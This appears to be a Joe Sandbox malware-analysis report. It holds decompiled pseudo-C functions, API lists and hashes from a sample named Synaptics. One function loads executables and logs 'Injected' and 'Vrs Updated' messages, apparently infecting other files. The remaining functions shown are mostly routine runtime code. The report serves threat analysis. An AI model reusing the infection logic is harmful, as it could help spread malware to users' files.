				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				E00404E70(_v16);
				_push(_t93);
				_push(0x477a75);
				_push( *[fs:eax]);
				 *[fs:eax] = _t95;
				if(E00409A48(_v8, _t96) != 0) {
					_push(_t93);
					_push(0x477a50);
					_push( *[fs:eax]);
					 *[fs:eax] = _t95;
					 *0x49ec78 = LoadLibraryA(E00404E80(_v8));
					_t45 =  *0x49ec78; // 0x3fb0000
					if(E004770E4(_t45, 0, _v16, __edi, __esi) != 0) {
						_t47 =  *0x49ec78; // 0x3fb0000
						E0047717C(_t47, 0,  &_v20, _v16, _t90, _t91);
						_t50 = E00409628(_v20, _t93, __eflags);
						__eflags = _t50 - _a12;
						if(_t50 >= _a12) {
							_t51 =  *0x49ec78; // 0x3fb0000
							FreeLibrary(_t51);
							E00404CCC(_a4, _v8, "Injected Canceled-> ");
						} else {
							E004774A8(_v8, 0, _v12, _t90, _t91, 1);
							E00404CCC(_a4, _v8, "Vrs Updated -> ");
						}
					} else {
						_t60 =  *0x49ec78; // 0x3fb0000
						FreeLibrary(_t60);
						E004774A8(_v8, 0, _v12, _t90, _t91, 0);
						E00404CCC(_a4, _v8, "Completed -> ");
					}
					_pop(_t85);
					 *[fs:eax] = _t85;
				}
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(0x477a7c);
				return E004049E4( &_v20, 4);
			}


















                                                                                                                                                                                          0x00477940
                                                                                                                                                                                          0x00477940
                                                                                                                                                                                          0x00477940
                                                                                                                                                                                          0x00477941
                                                                                                                                                                                          0x00477943
                                                                                                                                                                                          0x00477946
                                                                                                                                                                                          0x00477947
                                                                                                                                                                                          0x00477948
                                                                                                                                                                                          0x0047794b
                                                                                                                                                                                          0x0047794e
                                                                                                                                                                                          0x00477951
                                                                                                                                                                                          0x00477954
                                                                                                                                                                                          0x0047795a
                                                                                                                                                                                          0x00477962
                                                                                                                                                                                          0x0047796a
                                                                                                                                                                                          0x00477971
                                                                                                                                                                                          0x00477972
                                                                                                                                                                                          0x00477977
                                                                                                                                                                                          0x0047797a
                                                                                                                                                                                          0x00477987
                                                                                                                                                                                          0x0047798f
                                                                                                                                                                                          0x00477990
                                                                                                                                                                                          0x00477995
                                                                                                                                                                                          0x00477998
                                                                                                                                                                                          0x004779a9
                                                                                                                                                                                          0x004779b1
                                                                                                                                                                                          0x004779bd
                                                                                                                                                                                          0x004779f2
                                                                                                                                                                                          0x004779f7
                                                                                                                                                                                          0x004779ff
                                                                                                                                                                                          0x00477a04
                                                                                                                                                                                          0x00477a07
                                                                                                                                                                                          0x00477a2b
                                                                                                                                                                                          0x00477a31
                                                                                                                                                                                          0x00477a41
                                                                                                                                                                                          0x00477a09
                                                                                                                                                                                          0x00477a14
                                                                                                                                                                                          0x00477a24
                                                                                                                                                                                          0x00477a24
                                                                                                                                                                                          0x004779bf
                                                                                                                                                                                          0x004779bf
                                                                                                                                                                                          0x004779c5
                                                                                                                                                                                          0x004779d5
                                                                                                                                                                                          0x004779e5
                                                                                                                                                                                          0x004779e5
                                                                                                                                                                                          0x00477a48
                                                                                                                                                                                          0x00477a4b
                                                                                                                                                                                          0x00477a4b
                                                                                                                                                                                          0x00477a5c
                                                                                                                                                                                          0x00477a5f
                                                                                                                                                                                          0x00477a62
                                                                                                                                                                                          0x00477a74

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00477A50,?,00000000,00477A75), ref: 004779A4
                                                                                                                                                                                            • Part of subcall function 004770E4: FindResourceA.KERNEL32(03FB0000,00000000,0000000A), ref: 00477120
                                                                                                                                                                                            • Part of subcall function 004770E4: FreeResource.KERNEL32(00000000,03FB0000,00000000,0000000A,00000000,0047713F,?,00000000,0047716D,?,?,?,00000000,?,?,00477797), ref: 00477130
                                                                                                                                                                                          • FreeLibrary.KERNEL32(03FB0000,00000000,00000000,00477A50,?,00000000,00477A75), ref: 004779C5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLibraryResource$FindLoad
                                                                                                                                                                                          • String ID: Completed -> $Injected Canceled-> $Vrs Updated ->
                                                                                                                                                                                          • API String ID: 622515136-3620720946
                                                                                                                                                                                          • Opcode ID: 925dbb4ab29270250cee799371fa55bec3ce3484713addbee458504194b718b1
                                                                                                                                                                                          • Instruction ID: ba9099d9801d0205c677ecf17e877f95f1885b5d0e30a850265bd7c2820a7478
                                                                                                                                                                                          • Opcode Fuzzy Hash: 925dbb4ab29270250cee799371fa55bec3ce3484713addbee458504194b718b1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E317874A08204AFEB00EFA5D8519DE77B4EB89314B60C47BF908B7391D739AE01CB58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00448DC4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 56%
                                                                                                                                                                                          			E00448DC4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t9;
				void* _t11;
				intOrPtr _t17;
				void* _t28;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t37;
				struct HINSTANCE__* _t41;
				void* _t43;
				intOrPtr _t45;
				intOrPtr _t46;

				_t45 = _t46;
				_push(__ebx);
				_t43 = __edx;
				_t28 = __eax;
				if( *0x49eba0 == 0) {
					 *0x49eba0 = E0040D9DC("comctl32.dll", __eax);
					if( *0x49eba0 >= 0x60000) {
						_t41 = GetModuleHandleA("comctl32.dll");
						if(_t41 != 0) {
							 *0x49eba4 = GetProcAddress(_t41, "ImageList_WriteEx");
						}
					}
				}
				_v8 = E00422634(_t43, 1, 0);
				_push(_t45);
				_push(0x448ebe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				if( *0x49eba4 == 0) {
					_t9 = _v8;
					if(_t9 != 0) {
						_t9 = _t9 - 0xffffffec;
					}
					_push(_t9);
					_t11 = E00447D0C(_t28);
					_push(_t11);
					L0042C4AC();
					if(_t11 == 0) {
						_t33 =  *0x49d9c8; // 0x422f10
						E0040D200(_t33, 1);
						E00404378();
					}
				} else {
					_t17 = _v8;
					if(_t17 != 0) {
						_t17 = _t17 - 0xffffffec;
					}
					_push(_t17);
					_push(1);
					_push(E00447D0C(_t28));
					if( *0x49eba4() != 0) {
						_t34 =  *0x49d9c8; // 0x422f10
						E0040D200(_t34, 1);
						E00404378();
					}
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(0x448ec5);
				return E00403BEC(_v8);
			}
















                                                                                                                                                                                          0x00448dc5
                                                                                                                                                                                          0x00448dc8
                                                                                                                                                                                          0x00448dcb
                                                                                                                                                                                          0x00448dcd
                                                                                                                                                                                          0x00448dd6
                                                                                                                                                                                          0x00448de2
                                                                                                                                                                                          0x00448df1
                                                                                                                                                                                          0x00448dfd
                                                                                                                                                                                          0x00448e01
                                                                                                                                                                                          0x00448e0e
                                                                                                                                                                                          0x00448e0e
                                                                                                                                                                                          0x00448e01
                                                                                                                                                                                          0x00448df1
                                                                                                                                                                                          0x00448e23
                                                                                                                                                                                          0x00448e28
                                                                                                                                                                                          0x00448e29
                                                                                                                                                                                          0x00448e2e
                                                                                                                                                                                          0x00448e31
                                                                                                                                                                                          0x00448e3b
                                                                                                                                                                                          0x00448e75
                                                                                                                                                                                          0x00448e7a
                                                                                                                                                                                          0x00448e7c
                                                                                                                                                                                          0x00448e7c
                                                                                                                                                                                          0x00448e7f
                                                                                                                                                                                          0x00448e82
                                                                                                                                                                                          0x00448e87
                                                                                                                                                                                          0x00448e88
                                                                                                                                                                                          0x00448e8f
                                                                                                                                                                                          0x00448e91
                                                                                                                                                                                          0x00448e9e
                                                                                                                                                                                          0x00448ea3
                                                                                                                                                                                          0x00448ea3
                                                                                                                                                                                          0x00448e3d
                                                                                                                                                                                          0x00448e3d
                                                                                                                                                                                          0x00448e42
                                                                                                                                                                                          0x00448e44
                                                                                                                                                                                          0x00448e44
                                                                                                                                                                                          0x00448e47
                                                                                                                                                                                          0x00448e48
                                                                                                                                                                                          0x00448e51
                                                                                                                                                                                          0x00448e5a
                                                                                                                                                                                          0x00448e5c
                                                                                                                                                                                          0x00448e69
                                                                                                                                                                                          0x00448e6e
                                                                                                                                                                                          0x00448e6e
                                                                                                                                                                                          0x00448e5a
                                                                                                                                                                                          0x00448eaa
                                                                                                                                                                                          0x00448ead
                                                                                                                                                                                          0x00448eb0
                                                                                                                                                                                          0x00448ebd

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040D9DC: 73AC14E0.VERSION(00000000,?,00000000,0040DAB2), ref: 0040DA1E
                                                                                                                                                                                            • Part of subcall function 0040D9DC: 73AC14C0.VERSION(00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA53
                                                                                                                                                                                            • Part of subcall function 0040D9DC: 73AC1500.VERSION(?,0040DAC4,?,?,00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA6D
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00448DF8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00448E09
                                                                                                                                                                                          • 73751DE0.COMCTL32(00000000,?,00000000,00448EBE), ref: 00448E88
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: 73751AddressC1500HandleModuleProc
                                                                                                                                                                                          • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                                                                                                                                                                          • API String ID: 3699963180-3125200627
                                                                                                                                                                                          • Opcode ID: 028d70da097bf102ce3fdd8d86104c966a5ad625aa96c2d517d76ee05a24afb6
                                                                                                                                                                                          • Instruction ID: 78786ebc40bd40dec1c5389fa6359cb69700be1fbc3bb7ccab78b7c5a69fbc81
                                                                                                                                                                                          • Opcode Fuzzy Hash: 028d70da097bf102ce3fdd8d86104c966a5ad625aa96c2d517d76ee05a24afb6
                                                                                                                                                                                          • Instruction Fuzzy Hash: E3214870A04201ABE710EB7ADD56B6F36A8AB55708B60057FF805E72A2DF7DAC00D61D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042C900 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                                          			E0042C900(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x49e92d != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407298();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x49e914; // 0x42c900
					 *0x49e914 = E0042C4FC(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x49e914(_t27, _t29);
				}
				return _t24;
			}














                                                                                                                                                                                          0x0042c909
                                                                                                                                                                                          0x0042c90c
                                                                                                                                                                                          0x0042c916
                                                                                                                                                                                          0x0042c93b
                                                                                                                                                                                          0x0042c943
                                                                                                                                                                                          0x0042c963
                                                                                                                                                                                          0x0042c968
                                                                                                                                                                                          0x0042c973
                                                                                                                                                                                          0x0042c97e
                                                                                                                                                                                          0x0042c988
                                                                                                                                                                                          0x0042c989
                                                                                                                                                                                          0x0042c98a
                                                                                                                                                                                          0x0042c98b
                                                                                                                                                                                          0x0042c98c
                                                                                                                                                                                          0x0042c98d
                                                                                                                                                                                          0x0042c997
                                                                                                                                                                                          0x0042c999
                                                                                                                                                                                          0x0042c9a1
                                                                                                                                                                                          0x0042c9a2
                                                                                                                                                                                          0x0042c9a2
                                                                                                                                                                                          0x0042c9a7
                                                                                                                                                                                          0x0042c9a7
                                                                                                                                                                                          0x0042c918
                                                                                                                                                                                          0x0042c91d
                                                                                                                                                                                          0x0042c92a
                                                                                                                                                                                          0x0042c937
                                                                                                                                                                                          0x0042c937
                                                                                                                                                                                          0x0042c9b1

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C958
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0042C96D
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0042C978
                                                                                                                                                                                          • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C9A2
                                                                                                                                                                                            • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                                                                                                          • String ID: DISPLAY$GetMonitorInfoA
                                                                                                                                                                                          • API String ID: 2545840971-1370492664
                                                                                                                                                                                          • Opcode ID: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                                                                                                                                                          • Instruction ID: f52c56f8859c3bc03712ace229276911b675d95da7c00cdafe0d7f24be773c7c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E11B4F17017249FD720DF61AC84BABB7A8FB4A310F40493FE94597250D375A940C7AA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042C9D4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                                          			E0042C9D4(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x49e92e != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407298();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x49e918; // 0x42c9d4
					 *0x49e918 = E0042C4FC(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x49e918(_t27, _t29);
				}
				return _t24;
			}














                                                                                                                                                                                          0x0042c9dd
                                                                                                                                                                                          0x0042c9e0
                                                                                                                                                                                          0x0042c9ea
                                                                                                                                                                                          0x0042ca0f
                                                                                                                                                                                          0x0042ca17
                                                                                                                                                                                          0x0042ca37
                                                                                                                                                                                          0x0042ca3c
                                                                                                                                                                                          0x0042ca47
                                                                                                                                                                                          0x0042ca52
                                                                                                                                                                                          0x0042ca5c
                                                                                                                                                                                          0x0042ca5d
                                                                                                                                                                                          0x0042ca5e
                                                                                                                                                                                          0x0042ca5f
                                                                                                                                                                                          0x0042ca60
                                                                                                                                                                                          0x0042ca61
                                                                                                                                                                                          0x0042ca6b
                                                                                                                                                                                          0x0042ca6d
                                                                                                                                                                                          0x0042ca75
                                                                                                                                                                                          0x0042ca76
                                                                                                                                                                                          0x0042ca76
                                                                                                                                                                                          0x0042ca7b
                                                                                                                                                                                          0x0042ca7b
                                                                                                                                                                                          0x0042c9ec
                                                                                                                                                                                          0x0042c9f1
                                                                                                                                                                                          0x0042c9fe
                                                                                                                                                                                          0x0042ca0b
                                                                                                                                                                                          0x0042ca0b
                                                                                                                                                                                          0x0042ca85

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042CA2C
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0042CA41
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0042CA4C
                                                                                                                                                                                          • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042CA76
                                                                                                                                                                                            • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                                                                                                          • String ID: DISPLAY$GetMonitorInfoW
                                                                                                                                                                                          • API String ID: 2545840971-2774842281
                                                                                                                                                                                          • Opcode ID: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                                                                                                                                                          • Instruction ID: da6544c83ea616b7bbcbecc7cac92abfbfd15a320570470bed168d46318f2a96
                                                                                                                                                                                          • Opcode Fuzzy Hash: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                                                                                                                                                          • Instruction Fuzzy Hash: D11103B1B413289FD760CF61AC84BAFB7A8FB06310F40493BE85597290D375A944CBA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00428F38 Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E00428F38(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				int _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				struct HDC__* _t18;
				int _t31;
				int _t34;
				intOrPtr _t41;
				void* _t43;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t16 = __eax;
				_t46 = _t48;
				_t49 = _t48 + 0xfffffbf0;
				_v8 = __edx;
				_t43 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L4:
					return _t16;
				} else {
					_t16 = E004267F4(_v8, 0xff,  &_v1044);
					_t34 = _t16;
					if(_t34 == 0) {
						goto L4;
					} else {
						_push(0);
						L00407638();
						_v12 = _t16;
						_t18 = _v12;
						_push(_t18);
						L004072E0();
						_v16 = _t18;
						_v20 = SelectObject(_v16, _t43);
						_push(_t46);
						_push(0x428fe7);
						_push( *[fs:eax]);
						 *[fs:eax] = _t49;
						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
						_pop(_t41);
						 *[fs:eax] = _t41;
						_push(0x428fee);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						_t31 = _v12;
						_push(_t31);
						_push(0);
						L00407888();
						return _t31;
					}
				}
			}

















                                                                                                                                                                                          0x00428f38
                                                                                                                                                                                          0x00428f39
                                                                                                                                                                                          0x00428f3b
                                                                                                                                                                                          0x00428f43
                                                                                                                                                                                          0x00428f46
                                                                                                                                                                                          0x00428f4a
                                                                                                                                                                                          0x00428fee
                                                                                                                                                                                          0x00428ff3
                                                                                                                                                                                          0x00428f5b
                                                                                                                                                                                          0x00428f69
                                                                                                                                                                                          0x00428f6e
                                                                                                                                                                                          0x00428f72
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00428f74
                                                                                                                                                                                          0x00428f74
                                                                                                                                                                                          0x00428f76
                                                                                                                                                                                          0x00428f7b
                                                                                                                                                                                          0x00428f7e
                                                                                                                                                                                          0x00428f81
                                                                                                                                                                                          0x00428f82
                                                                                                                                                                                          0x00428f87
                                                                                                                                                                                          0x00428f94
                                                                                                                                                                                          0x00428f99
                                                                                                                                                                                          0x00428f9a
                                                                                                                                                                                          0x00428f9f
                                                                                                                                                                                          0x00428fa2
                                                                                                                                                                                          0x00428fb3
                                                                                                                                                                                          0x00428fba
                                                                                                                                                                                          0x00428fbd
                                                                                                                                                                                          0x00428fc0
                                                                                                                                                                                          0x00428fcd
                                                                                                                                                                                          0x00428fd6
                                                                                                                                                                                          0x00428fdb
                                                                                                                                                                                          0x00428fde
                                                                                                                                                                                          0x00428fdf
                                                                                                                                                                                          0x00428fe1
                                                                                                                                                                                          0x00428fe6
                                                                                                                                                                                          0x00428fe6
                                                                                                                                                                                          0x00428f72

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004267F4: GetObjectA.GDI32(?,00000004), ref: 0042680B
                                                                                                                                                                                            • Part of subcall function 004267F4: 73CCAEA0.GDI32(?,00000000,?,?,?,00000004,?,000000FF,?,?,?,00428F6E), ref: 0042682E
                                                                                                                                                                                          • 73CCAC50.USER32(00000000), ref: 00428F76
                                                                                                                                                                                          • 73CCA590.GDI32(?,00000000), ref: 00428F82
                                                                                                                                                                                          • SelectObject.GDI32(?), ref: 00428F8F
                                                                                                                                                                                          • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00428FE7,?,?,?,?,00000000), ref: 00428FB3
                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00428FCD
                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 00428FD6
                                                                                                                                                                                          • 73CCB380.USER32(00000000,?,?,?,?,00428FEE,?,00000000,00428FE7,?,?,?,?,00000000), ref: 00428FE1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Object$Select$A590B380ColorDeleteTable
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 980243606-0
                                                                                                                                                                                          • Opcode ID: 0ebad56f2c6e6d691b04411e0281d05579cb4a1ae04eb320be2d1e6186d7cc52
                                                                                                                                                                                          • Instruction ID: 4e07099c4c205c436fb256934ce996c76079a9fb80c20dbc0557a77875d025fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ebad56f2c6e6d691b04411e0281d05579cb4a1ae04eb320be2d1e6186d7cc52
                                                                                                                                                                                          • Instruction Fuzzy Hash: E8116671E052186BDB10EBE9DC41EAEB7BCEB08704F8144BAF904E7281DA789D40C765
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00421A98 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59threadsynchronizationwindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                          			E00421A98(void* __eax, void* __edi, void* __ebp) {
				struct tagMSG _v36;
				long _v40;
				void* _v44;
				void* __ebx;
				void* __esi;
				long _t12;
				long _t20;
				long _t29;
				signed int _t30;
				void* _t32;
				void* _t33;
				DWORD* _t35;

				_t32 = __edi;
				_t35 =  &_v40;
				_t33 = __eax;
				_v44 =  *((intOrPtr*)(__eax + 4));
				_t12 = GetCurrentThreadId();
				_t30 =  *0x49de40; // 0x49e034
				if(_t12 !=  *_t30) {
					WaitForSingleObject(_v44, 0xffffffff);
				} else {
					_t29 = 0;
					_t20 =  *0x49e854; // 0x214
					_v40 = _t20;
					do {
						if(_t29 == 2) {
							PeekMessageA( &_v36, 0, 0, 0, 0);
						}
						_t29 = MsgWaitForMultipleObjects(2,  &_v44, 0, 0x3e8, 0x40);
						_t30 = _t30 & 0xffffff00 | _t29 != 0xffffffff;
						E004218C0(_t33, _t30);
						if(_t29 == 1) {
							E004214B8(0, _t29, _t32, _t33);
						}
					} while (_t29 != 0);
				}
				GetExitCodeThread(_v44, _t35);
				asm("sbb edx, edx");
				E004218C0(_t33, _t30 + 1);
				return  *_t35;
			}















                                                                                                                                                                                          0x00421a98
                                                                                                                                                                                          0x00421a9a
                                                                                                                                                                                          0x00421a9d
                                                                                                                                                                                          0x00421aa2
                                                                                                                                                                                          0x00421aa6
                                                                                                                                                                                          0x00421aab
                                                                                                                                                                                          0x00421ab3
                                                                                                                                                                                          0x00421b14
                                                                                                                                                                                          0x00421ab5
                                                                                                                                                                                          0x00421ab5
                                                                                                                                                                                          0x00421ab7
                                                                                                                                                                                          0x00421abc
                                                                                                                                                                                          0x00421ac0
                                                                                                                                                                                          0x00421ac3
                                                                                                                                                                                          0x00421ad2
                                                                                                                                                                                          0x00421ad2
                                                                                                                                                                                          0x00421aec
                                                                                                                                                                                          0x00421af1
                                                                                                                                                                                          0x00421af6
                                                                                                                                                                                          0x00421afe
                                                                                                                                                                                          0x00421b02
                                                                                                                                                                                          0x00421b02
                                                                                                                                                                                          0x00421b07
                                                                                                                                                                                          0x00421b0b
                                                                                                                                                                                          0x00421b1f
                                                                                                                                                                                          0x00421b27
                                                                                                                                                                                          0x00421b2c
                                                                                                                                                                                          0x00421b39

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00421AA6
                                                                                                                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00421AD2
                                                                                                                                                                                          • MsgWaitForMultipleObjects.USER32 ref: 00421AE7
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00421B14
